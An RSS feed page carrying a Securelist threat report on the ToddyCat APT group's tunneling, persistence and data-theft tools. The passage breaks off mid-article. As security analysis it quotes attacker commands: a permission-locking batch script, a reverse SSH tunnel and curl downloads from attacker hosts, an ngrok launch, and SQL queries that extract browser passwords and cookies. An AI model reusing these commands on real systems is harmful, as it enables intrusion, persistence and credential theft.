[Valid RSS] This is a valid RSS feed.


This feed is valid, but interoperability with the widest range of feed readers could be improved by implementing the following recommendations.


  1. <?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
  2. xmlns:content=""
  3. xmlns:wfw=""
  4. xmlns:dc=""
  5. xmlns:atom=""
  6. xmlns:sy=""
  7. xmlns:slash=""
  8. >
  10. <channel>
  11. <title>Securelist</title>
  12. <atom:link href="" rel="self" type="application/rss+xml" />
  13. <link></link>
  14. <description></description>
  15. <lastBuildDate>Mon, 22 Apr 2024 10:36:52 +0000</lastBuildDate>
  16. <language>en-US</language>
  17. <sy:updatePeriod>
  18. hourly </sy:updatePeriod>
  19. <sy:updateFrequency>
  20. 1 </sy:updateFrequency>
  21. <generator></generator>
  23. <image>
  24. <url></url>
  25. <title>Securelist</title>
  26. <link></link>
  27. <width>32</width>
  28. <height>32</height>
  29. </image>
  30. <item>
  31. <title>ToddyCat is making holes in your infrastructure</title>
  32. <link></link>
  33. <comments></comments>
  34. <dc:creator><![CDATA[Andrey Gunkin, Alexander Fedotov, Natalya Shornikova]]></dc:creator>
  35. <pubDate>Mon, 22 Apr 2024 10:00:00 +0000</pubDate>
  36. <category><![CDATA[APT reports]]></category>
  37. <category><![CDATA[APT]]></category>
  38. <category><![CDATA[Cyber espionage]]></category>
  39. <category><![CDATA[Data theft]]></category>
  40. <category><![CDATA[SSH]]></category>
  41. <category><![CDATA[Targeted attacks]]></category>
  42. <category><![CDATA[ToddyCat]]></category>
  43. <category><![CDATA[VPN]]></category>
  44. <category><![CDATA[WhatsApp]]></category>
  45. <category><![CDATA[APT (Targeted attacks)]]></category>
  46. <guid isPermaLink="false"></guid>
  48. <description><![CDATA[We continue to report on the APT group ToddyCat. This time, we’ll talk about traffic tunneling, constant access to a target infrastructure and data extraction from hosts.]]></description>
  49. <content:encoded><![CDATA[<p><img width="990" height="400" src="" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>We continue covering the activities of the APT group <a href="" target="_blank" rel="noopener"><strong>ToddyCat</strong></a>. In our <a href="" target="_blank" rel="noopener">previous article</a>, we described tools for collecting and exfiltrating files (<strong>LoFiSe</strong> and <strong>PcExter</strong>). This time, we have investigated how attackers obtain constant access to compromised infrastructure, what information on the hosts they are interested in, and what tools they use to extract it.</p>
  50. <p><strong>ToddyCat </strong>is an <a href="" target="_blank" rel="noopener">APT</a> group that predominantly targets governmental organizations, some of them defense related, located in the Asia-Pacific region. One of the group&#8217;s main goals is to steal sensitive information from hosts.</p>
  51. <p>During the observation period, we noted that this group stole data on an industrial scale. To collect large volumes of data from many hosts, attackers need to automate the data harvesting process as much as possible, and provide several alternative means to continuously access and monitor systems they attack. We decided to investigate how this was implemented by ToddyCat. Note that all tools described in this article are applied at the stage where the attackers have compromised high-privileged user credentials allowing them to connect to remote hosts. In most cases, the adversary connected, transferred and run all required tools with the help of <a href="" target="_blank" rel="noopener">PsExec</a> or <a href="" target="_blank" rel="noopener">Impacket</a>.</p>
  52. <h2 id="tools-for-traffic-tunneling">Tools for traffic tunneling</h2>
  53. <p>Having several tunnels to the infected infrastructure implemented with different tools allow attackers to maintain access to systems even if one of the tunnels is discovered and eliminated. By securing constant access to the infrastructure, attackers are able to perform reconnaissance and connect to remote hosts.</p>
  54. <h3 id="reverse-ssh-tunnel">Reverse SSH Tunnel</h3>
  55. <p>One way to gain access to remote network services is to create a reverse SSH tunnel.</p>
  56. <p>Attackers use several files to launch a reverse SSH tunnel:</p>
  57. <ol>
  58. <li>The SSH client from the OpenSSH for Windows toolkit, along with the library required for running it</li>
  59. <li>An OPENSSH private key file</li>
  60. <li>The &#8220;<strong>a.bat</strong>&#8221; script to hide the private key file</li>
  61. </ol>
  62. <p>The attackers transferred all files to the target host via <strong>SMB </strong>with the help of shared folders <strong>(<a href="">T1021.002: </a><a href="" target="_blank" rel="noopener">Remote Services: SMB/Windows Admin Shares</a>)</strong>.</p>
  63. <p>The attackers did not attempt to hide the presence of the SSH client file in the system. The file retained its original name and was placed inside folders whose names indicated the presence of an SSH client in the system.</p><pre class="crayon-plain-tag">C:\program files\OpenSSH\ssh.exe
  64. C:\programdata\sshd\ssh.exe
  65. C:\programdata\ssh\ssh.exe</pre><p>
  66. The private key files required for establishing a connection to the remote server were copied to the following paths.</p><pre class="crayon-plain-tag">C:\Windows\AppReadiness\read.ini
  67. C:\Windows\AppReadiness\data.dat
  68. C:\Windows\AppReadiness\log.dat
  69. C:\Windows\AppReadiness\value.dat</pre><p>
  70. <strong>OpenSSH </strong>private key files are normally created without extensions, but they can be given the extension .key or similar. In the example, the attackers used .ini and .dat extensions for private key files, obviously to hide their true purpose. Files like that look less suspicious in the command-line interface than .key files or files without an extension.</p>
  71. <p>After the private key files have been copied to the <strong>AppReadiness </strong>folder, the adversary copies and runs an <strong>a.bat</strong> script. In the attacked systems, it was found mostly in temporary directories or in users&#8217; shared folders.</p><pre class="crayon-plain-tag">c:\users\public\a.bat</pre><p>
  72. This file contains the following commands.</p><pre class="crayon-plain-tag">@echo off
  73. ::# Set Key File Variable:
  75. Set Key="C:\Windows\AppReadiness"
  77. takeown /f "%Key%"
  78. icacls "%Key%" /remove "BUILTIN\Administrators" &gt; "%temp%\a.txt"
  79. icacls "%Key%" /remove "Administrators" &gt;&gt; "%temp%\a.txt"
  80. icacls "%Key%" /remove "NT AUTHORITY\Authenticated Users" &gt;&gt; "%temp%\a.txt"
  81. icacls "%Key%" /remove "CREATOR OWNER" &gt;&gt; "%temp%\a.txt"
  82. icacls "%Key%" /remove "BUILTIN\Users" &gt;&gt; "%temp%\a.txt"
  83. icacls "%Key%" /remove "Users" &gt;&gt; "%temp%\a.txt"
  84. icacls "%Key%" &gt;&gt; "%temp%\a.txt"
  86. ::# Remove Variable:
  87. set "Key="</pre><p>
  88. In Windows,<strong> C:\Windows\AppReadiness</strong> is part of the AppReadiness service and stores application files for initial configuration when applications are first launched or when a user logs on for the first time.</p>
  89. <div id="attachment_112447" style="width: 813px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img fetchpriority="high" decoding="async" aria-describedby="caption-attachment-112447" class="size-full wp-image-112447" src="" alt="The icacls command output for the AppReadiness folder with default values" width="803" height="167" srcset=" 803w, 300w, 768w, 800w, 740w" sizes="(max-width: 803px) 100vw, 803px" /></a><p id="caption-attachment-112447" class="wp-caption-text">The icacls command output for the AppReadiness folder with default values</p></div>
  90. <p>The image above shows the default permissions for this folder:</p>
  91. <ul>
  92. <li>Administrators and system: full permissions</li>
  93. <li>Authorized users: read-only permissions</li>
  94. </ul>
  95. <p>This means that regular users can view the contents of the folder.</p>
  96. <p>The <strong>a.bat</strong> script sets the system as the owner of the folder and removes all other users from its discretionary access control list (DACL). The image below shows the DACL for <strong>C:\Windows\AppReadiness</strong> after the script has run:</p>
  97. <div id="attachment_112448" style="width: 803px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img decoding="async" aria-describedby="caption-attachment-112448" class="size-full wp-image-112448" src="" alt="The icacls command output for the AppReadiness folder after a.bat script has executed" width="793" height="101" srcset=" 793w, 300w, 768w, 740w" sizes="(max-width: 793px) 100vw, 793px" /></a><p id="caption-attachment-112448" class="wp-caption-text">The icacls command output for the AppReadiness folder after a.bat script has executed</p></div>
  98. <p>Once the permissions have been changed, neither normal users nor administrators will be able to access this folder. Attempting to open it will cause a &#8220;no permission&#8221; error.</p>
  99. <div id="attachment_112449" style="width: 746px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img decoding="async" aria-describedby="caption-attachment-112449" class="size-full wp-image-112449" src="" alt="Access denied error and Security tab for the AppReadiness folder" width="736" height="496" srcset=" 736w, 300w, 519w, 415w" sizes="(max-width: 736px) 100vw, 736px" /></a><p id="caption-attachment-112449" class="wp-caption-text">Access denied error and Security tab for the AppReadiness folder</p></div>
  100. <p>To start the tunnel, attackers create a scheduled task that runs the following command.</p><pre class="crayon-plain-tag">C:\PROGRA~1\OpenSSH\ssh.exe -i C:\Windows\AppReadiness\value.dat -o
  101. StrictHostKeyChecking=accept-new -R 31481:localhost:53
  102. systemtest01@103[.]27.202.85 -p 22222 -fN</pre><p>
  103. This command creates an SSH connection to a remote server with the IP address <strong>103[.]27.202.85</strong> on port <strong>22222 </strong>as the user named <strong>systemtestXX</strong>, where <strong>XX</strong> is a number. This connection will redirect network traffic from a certain port on the server to a certain port on the infected host. This is needed to provide the malicious server with constant access to the services running on the target host and listening on the specified port.</p>
  104. <p>In the example above, the user <strong>systemtest01</strong> establishes a connection that redirects traffic from port <strong>31481 </strong>on the server to port <strong>53</strong> on the target host. A connection like this created on domain controllers allows attackers to obtain the IP addresses of hosts on the internal network through DNS queries.</p>
  105. <p>Each user is assigned to a different port on the infected host. For example, the user <strong>systemtest05 </strong>redirects traffic from the malicious server to port <strong>445</strong>, normally used by SMB services.</p>
  106. <p>The remote server IP information is shown in the table below.</p>
  107. <table width="100%">
  108. <tbody>
  109. <tr>
  110. <td width="17%"><strong>IP</strong></td>
  111. <td width="16%"><strong>Country + ASN</strong></td>
  112. <td width="16%"><strong>Net name</strong></td>
  113. <td width="17%"><strong>Net Description</strong></td>
  114. <td width="17%"><strong>Address </strong></td>
  115. <td width="17%"><strong>Email </strong></td>
  116. </tr>
  117. <tr>
  118. <td>103.27.202[.]85</td>
  119. <td>Thailand, AS58955</td>
  120. <td>BANGMOD-VPS-NETWORK</td>
  121. <td>Bangmod VPS Network</td>
  122. <td>Bangmod-IDC Supermicro Thailand Powered by CSloxinfo</td>
  123. <td></td>
  124. </tr>
  125. </tbody>
  126. </table>
  127. <p>The whole process of creating an SSH tunnel can be described with the diagram given below.</p>
  128. <div id="attachment_112450" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112450" class="size-large wp-image-112450" src="" alt="Diagram of SSH tunnel creation" width="1024" height="459" /></a><p id="caption-attachment-112450" class="wp-caption-text">Diagram of SSH tunnel creation</p></div>
  129. <h3 id="softether-vpn">SoftEther VPN</h3>
  130. <p>The next tool that the attackers used for tunneling was the server utility (VPN Server) from the SoftEther VPN package.</p>
  131. <p><a href="" target="_blank" rel="noopener">SoftEther VPN</a> is an open-source solution developed as part of academic research at the University of Tsukuba that allows creating VPN connections via many popular protocols, such as L2TP/IPsec, OpenVPN, MS-SSTP, L2TPv3, EtherIP and others.</p>
  132. <p>To launch the VPN server, the attackers used the following files:</p>
  133. <ul>
  134. <li><strong>vpnserver_x64.exe</strong>: a digitally signed VPN server executable</li>
  135. <li><strong>hamcore.se2</strong>: a container file that includes components required to run vpnserver_x64.exe</li>
  136. <li><strong>vpn_server.config</strong>: server configuration</li>
  137. </ul>
  138. <p>In the operating system, the VPN server can run as a service or as an application with a GUI. The mode is set via a command-line parameter.</p>
  139. <p>In virtually every case we observed, the attackers renamed <strong>vpnserver_x64.exe</strong> to hide its purpose in the infected system. The following names of, and paths to, this file are known:</p><pre class="crayon-plain-tag">c:\programdata\ssh\vmtools.exe
  140. c:\programdata\lenovo\lenovo\kln.exe
  141. c:\programdata\iobit\iobitrtt\tmp\mstime.exe
  142. c:\perflogs\ecache\boot.exe
  143. C:\users\public\music\wia.exe
  144. c:\windows\debug\wia\wia.exe
  145. c:\users\public\music\taskllst.exe
  146. c:\programdata\lenovo\lenovo\main.exe
  147. c:\programdata\intel\gcc\gcc\boot.exe
  148. c:\programdata\lenovo\lenovodisplaycontrolcenterservice\netscan.exe
  149. c:\programdata\kasperskylab\kaspersky.exe</pre><p>
  150. You may notice that in some cases, the attackers used the names of security products to conceal the purpose of the file.</p>
  151. <p>The file <strong>hamcore.se2</strong> was not renamed in the attacked systems, as it was loaded by the VPN server by name from the same folder where the VPN server executable was located.</p>
  152. <p>To transfer the tools to victim hosts, the attackers used their standard technique of copying files through shared resources (<strong><a href="" target="_blank" rel="noopener">T1021.002 Remote Services: SMB/Windows Admin Shares</a></strong>), and downloaded files from remote resources using the <strong>curl </strong>utility (see below).</p><pre class="crayon-plain-tag">"cmd.exe" /C curl http://www.netportal.or[.]kr/common/css/main.js -o
  153. c:\windows\debug\wia\wia.exe &gt; C:\WINDOWS\Temp\vwqkspeq.tmp 2&gt;&amp;1
  154. "cmd.exe" /C curl http://www.netportal.or[.]kr/common/css/ham.js -o
  155. c:\windows\debug\wia\hamcore.se2 &gt; C:\WINDOWS\Temp\nohEicOE.tmp 2&gt;&amp;1</pre><p>
  156. We observed the following remote resources being used as download sources.</p>
  157. <table width="100%">
  158. <tbody>
  159. <tr>
  160. <td width="65%"><strong>URL</strong></td>
  161. <td width="35%"><strong>Original file name</strong></td>
  162. </tr>
  163. <tr>
  164. <td>hxxp://www.netportal.or[.]kr/common/css/main.js</td>
  165. <td>vpnserver_x64.exe</td>
  166. </tr>
  167. <tr>
  168. <td>hxxp://www.netportal.or[.]kr/common/css/ham.js</td>
  169. <td>Hamcore.se2</td>
  170. </tr>
  171. <tr>
  172. <td>hxxp://23.106.122[.]5/hamcore.se2</td>
  173. <td>Hamcore.se2</td>
  174. </tr>
  175. <tr>
  176. <td>hxxps://etracking.nso.go[.]th/UserFiles/File/111/tasklist.exe</td>
  177. <td>vpnserver_x64.exe</td>
  178. </tr>
  179. <tr>
  180. <td>hxxps://etracking.nso.go[.]th/UserFiles/File/111/hamcore.se2</td>
  181. <td>Hamcore.se2</td>
  182. </tr>
  183. </tbody>
  184. </table>
  185. <p>In most cases, the configuration file was copied along with the server executable. However, in some cases, it was not copied but created by executing vpnserver_x64.exe with the options <strong>/install</strong> or <strong>/usermode_hidetray</strong>, and then edited.</p><pre class="crayon-plain-tag">"cmd.exe" /C c:\users\public\music\taskllst.exe /install &gt; C:\Windows\Temp\fnOcaiqm.tmp 2&gt;&amp;1
  186. "cmd.exe" /C c:\users\public\music\taskllst.exe /usermode_hidetray &gt; C:\Windows\Temp\TSwkLRsR.tmp</pre><p>
  187. In this case, after installing the server in the system, the attackers changed the server settings in <strong>vpn_server.config</strong>.</p>
  188. <p>Data for connecting the remote client to the server and its authentication details are added to the configuration file:</p>
  189. <table width="100%">
  190. <tbody>
  191. <tr>
  192. <td width="60%"><strong>AccountName</strong></td>
  193. <td width="40%"><strong>Hostname</strong></td>
  194. </tr>
  195. <tr>
  196. <td>ha.bbmouseme[.]com</td>
  197. <td>118[.]193.40.42</td>
  198. </tr>
  199. </tbody>
  200. </table>
  201. <h3 id="ngrok-agent-and-krong">Ngrok agent and Krong</h3>
  202. <p>Another way the attackers accessed the remote infrastructure was by tunneling to a legitimate cloud provider. An application running on the user&#8217;s host with access to the local infrastructure can connect through a legitimate agent to the cloud and redirect traffic or run certain commands.</p>
  203. <p><a href="" target="_blank" rel="noopener">Ngrok</a> is a lightweight agent that can redirect traffic from endpoints to cloud infrastructure and vice versa. The attackers installed ngrok on target hosts and used it to redirect C2 traffic from the cloud infrastructure to a certain port on these hosts.</p>
  204. <p>The agent can be started, for instance, with the following command.</p><pre class="crayon-plain-tag">"cmd" /c "cd C:\windows\temp\ &amp; Intel.exe tcp --region=ap 54112 --
  205. authtoken 2GskqGD&lt;token&gt;txB7WyV"</pre><p>
  206. The port where ngrok redirects C2 traffic is also the port that another tool, Krong, listens on. Krong is a DLL file <a href="" target="_blank" rel="noopener">side-loaded</a> <strong>(<a href="" target="_blank" rel="noopener">T1574.002 Hijack Execution Flow: DLL Side-Loading</a>)</strong> with a legitimate application digitally signed by AVG TuneUp. The tool receives through the command-line interface the address and the port on which to expect a connection.</p><pre class="crayon-plain-tag">"cmd" /c "cd C:\windows\temp\ &amp; SystemInformation.exe 54112"</pre><p>
  207. Krong is a proxy that encrypts the data transmitted through it using the XOR function.</p>
  208. <div id="attachment_112451" style="width: 343px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112451" class="size-full wp-image-112451" src="" alt="Code snippet for deciphering received data" width="333" height="457" srcset=" 333w, 219w, 255w, 204w" sizes="(max-width: 333px) 100vw, 333px" /></a><p id="caption-attachment-112451" class="wp-caption-text">Code snippet for deciphering received data</p></div>
  209. <p>This allows Krong to hide the contents of the traffic to evade detection.</p>
  210. <h3 id="frp-client">FRP client</h3>
  211. <p>After creating tunnels on target hosts using OpenSSH or SoftEther VPN, attackers additionally install the <a href="" target="_blank" rel="noopener">FRP client</a>. FRP is a fast reverse proxy written in Go that allows access from the Internet to a local server located behind a NAT or firewall. FRP has a web interface for changing settings and viewing connection statistics.</p>
  212. <p>The attackers used two files to run the client:</p>
  213. <ul>
  214. <li><strong>Frpc.exe</strong>: a FRP client executable file</li>
  215. <li><strong>Frpc.toml</strong>: a client configuration file</li>
  216. </ul>
  217. <p>The files are given arbitrary names. Also, the configuration file extension is changed from the standard .toml to .ini, as is the case with OpenSSH private key files.</p>
  218. <p>After copying the files to the target host, the attackers create a service with an arbitrary name, which is started via the following command.</p><pre class="crayon-plain-tag">c:\windows\debug\tck.exe -c c:\windows\debug\tc.ini</pre><p>
  219. This starts the FRP client with the configuration file &#8220;tc.ini&#8221;. The traffic is then routed from C2 through this tool.</p>
  220. <h2 id="data-collection-tools">Data collection tools</h2>
  221. <h3 id="cuthead-for-data-collection">Cuthead for data collection</h3>
  222. <p>Recently, ToddyCat started using a new tool we named <strong>cuthead </strong>to search for documents. The name originated from the &#8220;file description&#8221; field of the sample we found. It is a .NET compiled executable designed to search for files and store those it finds inside an archive. The tool can search for specified file extensions or words in the file name.</p>
  223. <p>Cuthead tool accepts the following arguments:</p><pre class="crayon-plain-tag">fkw.exe &lt;date&gt; &lt;extensions&gt; [keywords]</pre><p>
  224. <ul>
  225. <li><strong>Date:</strong> the date when the file was last modified, in <strong>yyyyMMdd </strong> The search looks for files modified on that date or later</li>
  226. <li><strong>Extensions</strong>: a string without spaces that contains file extensions separated by semicolons</li>
  227. <li><strong>Keywords</strong>: a string without spaces that contains semicolon-delimited words to look for in file names</li>
  228. </ul>
  229. <p>Here is an example of a <strong>cuthead</strong> launch command.</p><pre class="crayon-plain-tag">"c:\intel\fkw.exe" 20230626 pdf;doc;docx;xls;xlsx</pre><p>
  230. In this case, the attackers collected all MS Excel, MS Word and PDF files modified after June 26, 2023.</p>
  231. <p>Once launched, the tool processes the command-line parameters and begins a recursive search for files in the file system on all available drives (<strong><a href="" target="_blank" rel="noopener">T1005 Data from Local System</a></strong>). Folders that contain the following substrings are excluded from the search.</p><pre class="crayon-plain-tag">$
  232. Windows
  233. Program Files
  234. Programdata
  235. Application Data
  236. Program Files (x86)
  237. Documents and Settings</pre><p>
  238. Also, the files are excluded from the search if they meet the following criteria:</p>
  239. <ul>
  240. <li>The file size is greater than 50 Mb (52428800 bytes).</li>
  241. <li>The file extensions do not match those specified in the command-line parameters.</li>
  242. <li>The names do not contain the keywords specified in the command-line parameters.</li>
  243. </ul>
  244. <p>A list of files found by the search is passed to the function that creates ZIP archives with the password &#8220;Unsafe404&#8221;. In different versions of the tool, this function has different names but the same purpose. The open-source tool <a href="" target="_blank" rel="noopener">icsharpcode/SharpZipLib</a> v. is used for creating archives (<strong><a href="" target="_blank" rel="noopener">T1560.002 Archive Collected Data: Archive via Library</a></strong>).</p>
  245. <p>Several later variants of cuthead were found with all required options – a list of file extensions and a last modified date that was typically within the previous 7 days – hardcoded within the software. We believe this was done to automate the collection process.</p>
  246. <h3 id="waexp-whatsapp-data-stealer">WAExp: WhatsApp data stealer</h3>
  247. <p>This tool is written in .NET and designed to search for and collect browser local storage files containing data from the web version of WhatsApp ( For users of the WhatsApp web app, their browser local storage contains their profile details, chat data, the phone numbers of users they chat with and current session data. Attackers can gain access to this data by copying the browser&#8217;s local storage files.</p>
  248. <p>The executable accepts the following arguments.</p><pre class="crayon-plain-tag">app.exe [check|copy|start] [remote]</pre><p>
  249. <strong>Check</strong>: checks the presence of data on the host.<br />
  250. <strong>Copy</strong>: copies data it finds to the temporary folder.<br />
  251. <strong>Start:</strong> first, copies the data to the temporary folder and then, packs the data into an archive file.<br />
  252. <strong>Remote</strong>: the name of the remote host.</p>
  253. <p>When executed with &#8220;<strong>check</strong>&#8220;, the tool begins searching for user folders. If &#8220;<strong>remote</strong>&#8221; is specified, user folders are searched along &#8220;<strong>\\[remote]\C$\users\</strong>&#8220;. If it is not specified, the malware uses the environment variable <strong>%SystemDrive%</strong> value, retrieving the name of the system drive from it. It then searches inside the Users folder on that drive. Next, the tool goes through all folders in this directory except the following default ones.</p><pre class="crayon-plain-tag">All Users
  254. Default User
  255. Default
  256. Public</pre><p>
  257. After it locates the user folders, WAExp seeks out file paths for WhatsApp database files in the Chrome, Edge, and Mozilla local storages.</p>
  258. <p>ForChrome, the tool opens <strong>&lt;User&gt;\Appdata\local\Google\</strong> and for Edge, <strong>&lt;User&gt;\Appdata\local\Microsoft\Edge\</strong>. Inside these, it looks for a folder with the following name inside the subfolders.</p><pre class="crayon-plain-tag">https_web.whatsapp.com_0.indexeddb.leveldb</pre><p>
  259. For Mozilla, the tool opens<strong>&lt;User&gt;\Appdata\roaming\</strong> and looks for a folder with the following name inside the subfolders:</p><pre class="crayon-plain-tag"></pre><p>
  260. Roaming may contain several Mozilla folders with storage data. For example,Mozilla Thunderbird can store this data too, as it supports a WhatsApp plugin.</p>
  261. <div id="attachment_112452" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112452" class="size-large wp-image-112452" src="" width="1024" height="262" srcset=" 1024w, 300w, 768w, 740w, 1096w, 800w, 1131w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112452" class="wp-caption-text">WAExp &#8220;check&#8221; output with results for Chrome, Edge, Firefox and Thunderbird</p></div>
  262. <p>In the image above, you can see the output of the tool running with the &#8220;<strong>check</strong>&#8221; parameter. It shows storage files for <strong>Chrome</strong>, <strong>Edge</strong> and <strong>Firefox</strong>, as well as the <strong>Thunderbird</strong> mail client detected on the host.</p>
  263. <p>When executed with the &#8220;<strong>copy</strong>&#8221; parameter, WAExp copies all data storage files in the system to the following temporary storage folder.</p><pre class="crayon-plain-tag">C:\Programdata\Microsoft\Default\</pre><p>
  264. The last parameter that the tool uses is <strong>&#8220;start&#8221;</strong>. It gathers target files inside a temporary folder, as described in the <strong>copy</strong> function, and packs these into an archive with the help of the <strong>System.IO.Compression.ZipFile</strong> module (<strong><a href="" target="_blank" rel="noopener">T1560.002 Archive Collected Data: Archive via Library</a></strong>).</p>
  265. <p>It saves the archive file under a name consisting of the word &#8216;Default&#8217; and a timestamp, without extension, at the following path:</p><pre class="crayon-plain-tag">C:\Programdata\Microsoft\Default-yyyyMMdd-hhmmss</pre><p>
  266. After that, it deletes the temporary folder, along with the web browsers&#8217; and other clients&#8217; folders containing <strong></strong> data.</p>
  267. <p>The image below shows an example of WAExp output when run with the various startup parameters.</p>
  268. <div id="attachment_112453" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112453" class="size-large wp-image-112453" src="" alt="WAExp output for its various command-line parameters" width="1024" height="510" srcset=" 1024w, 300w, 768w, 703w, 740w, 563w, 800w, 1069w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112453" class="wp-caption-text">WAExp output for its various command-line parameters</p></div>
  269. <p>The operations shown above collect <strong>Chrome</strong> data and generate an archive, whose contents are shown below.</p>
  270. <div id="attachment_112454" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112454" class="size-large wp-image-112454" src="" alt="Archive file containing data stolen by WAExp" width="1024" height="398" srcset=" 1024w, 300w, 768w, 900w, 740w, 720w, 800w, 1046w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112454" class="wp-caption-text">Archive file containing data stolen by WAExp</p></div>
  271. <h3 id="tomberbil-for-stealing-passwords-from-browsers">TomBerBil for stealing passwords from browsers</h3>
  272. <p>In addition to the data that attackers can collect from hosts, they are also interested in obtaining access to all online services that target users have access to. For an adversary with high privileges in the system, one fairly easy way to do this is to decrypt browser data containing cookies and passwords that the user may have saved to autofill authentication forms (<strong><a href="" target="_blank" rel="noopener">T1555.003 Credentials from Password Stores: Credentials from Web Browsers</a></strong>).</p>
  273. <p>There are many open-source tools available for decrypting storage data, one of these being <a href="" target="_blank" rel="noopener"><strong>mimikatz</strong></a>. The problem for the adversary is that these are well known to security systems and will immediately raise red flags if detected in the infrastructure.</p>
  274. <p>To avoid detection, attackers have created a range of tools implemented with different technologies and designed for the same purpose: to extract cookies and passwords from <strong>Chrome </strong>and <strong>Edge</strong>. Both browsers use the <a href="" target="_blank" rel="noopener"><strong>CryptProtectData</strong></a> feature from <strong>DPAPI </strong>(Data Protection Application Programming Interface) to encrypt data. It protects data with the current user&#8217;s password and a special encryption master key.</p>
  275. <p>All <strong>TomBerBil </strong>variants work according to the same principle. After starting, the malware begins to enumerate all processes running in the system and search for all instances of <strong>explorer.exe</strong>. It identifies the process users and compiles a list.</p>
  276. <div id="attachment_112455" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112455" class="size-large wp-image-112455" src="" alt="Username identification function" width="1024" height="302" srcset=" 1024w, 300w, 768w, 740w, 949w, 800w, 1095w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112455" class="wp-caption-text">Username identification function</p></div>
  277. <p>The image above shows an example of the function that identifies users by process ID. It sends a <strong>WMI </strong>request to the <strong>Win32_Process </strong>class to receive an object whose <strong>processID property </strong>equals the given PID. It then calls the <strong>GetOwner </strong>method, which returns the user and domain name for the process.</p>
  278. <p>After this, the malware searches for the encryption key, stored in the <strong>encrypted_key </strong>field in the following browser <strong>JSON </strong>files.</p><pre class="crayon-plain-tag">%LOCALAPPDATA%\Google\Chrome\User Data\Local State
  279. %LOCALAPPDATA%\Microsoft\Edge\User Data\Local State</pre><p>
  280. It then impersonates the users it identified and attempts to decrypt the master key using the <strong>CryptUnprotectData</strong> function. To do this, it calls <strong>Unprotect</strong> function from the <strong>System.Security.Cryptography.ProtectedData</strong> package, which, in turn, uses <strong>CryptUnprotectData </strong>function call from Windows DPAPI.</p>
  281. <div id="attachment_112456" style="width: 622px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112456" class="size-full wp-image-112456" src="" alt="Calling the Unprotect function" width="612" height="76" srcset=" 612w, 300w" sizes="(max-width: 612px) 100vw, 612px" /></a><p id="caption-attachment-112456" class="wp-caption-text">Calling the Unprotect function</p></div>
  282. <p>The image above shows an example of the <strong>Unprotect</strong> function call, which receives an array of bytes obtained from the <strong>encrypted_key</strong> field. The value of <strong>DataProtectionScope.CurrentUser</strong> is passed as the third parameter. This means that the user context of the calling process will be used when decrypting the data. The tool impersonates the users it finds in explorer.exe for this very purpose.</p>
  283. <p>If the decryption is successful, the malware searches for <strong>Login Data</strong> and <strong>\Network\Cookies</strong> files inside the following folders.</p><pre class="crayon-plain-tag">%LOCALAPPDATA%\Google\Chrome\User Data\Default
  284. %LOCALAPPDATA%\Google\Chrome\User Data\Profile *</pre><p>
  285. It copies any files it finds to the temporary folder, where it opens them as SQL database files and runs the following queries.</p><pre class="crayon-plain-tag">SELECT origin_url, username_value, password_value FROM logins
  286. SELECT cast(creation_utc as text) as creation_utc, host_key, name, path, cast(expires_utc as text) as
  287. expires_utc, cast(last_access_utc as text) as last_access_utc, encrypted_value FROM cookies</pre><p>
  288. Data retrieved this way is decrypted with the master key and saved in special files.</p>
  289. <p>Most versions of the malware tool log their actions. Below is an example of a log file that they generate:</p><pre class="crayon-plain-tag">[+] Begin 7/28/2023 1:12:37 PM
  290. [+] Current user SYSTEM
  291. [*] [5516] [explorer] [UserName]
  292. [+] Impersonate user UserName
  293. [+] Current user UserName
  294. [+] Local State File: C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Local State
  295. [+] MasterKeyBytes: 6j&lt;...&gt;k=
  296. [&gt;] Profile: C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default
  297. [+] Copy C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default\Login Data to C:\Windows\TEMP\tmpF319.tmp
  298. [+] Delete File C:\Windows\TEMP\tmpF319.tmp
  299. [+] Copy C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies to C:\Windows\TEMP\tmpFA1F.tmp
  300. [+] Delete File C:\Windows\TEMP\tmpFA1F.tmp
  301. [+] Local State File: C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Local State
  302. [+] MasterKeyBytes: fv&lt;...&gt;GM=
  303. [&gt;] Profile: C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default
  304. [+] Copy C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default\Login Data to C:\Windows\TEMP\tmpFCB0.tmp
  305. [+] Delete File C:\Windows\TEMP\tmpFCB0.tmp
  306. [+] Copy C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies to C:\Windows\TEMP\tmpFD5D.tmp
  307. [+] Delete File C:\Windows\TEMP\tmpFD5D.tmp
  308. [+] Recvtoself
  309. [+] Current user SYSTEM
  310. [+] End 7/28/2023 1:12:52 PM</pre><p>
  311. One of the variants mimics <strong>Kaspersky Anti-Virus. </strong>This executable, written in .NET, is named <strong>avpui.exe</strong> (<strong><a href="" target="_blank" rel="noopener">T1036.005 Masquerading: Match Legitimate Name or Location</a></strong>) and contains relevant metadata:</p>
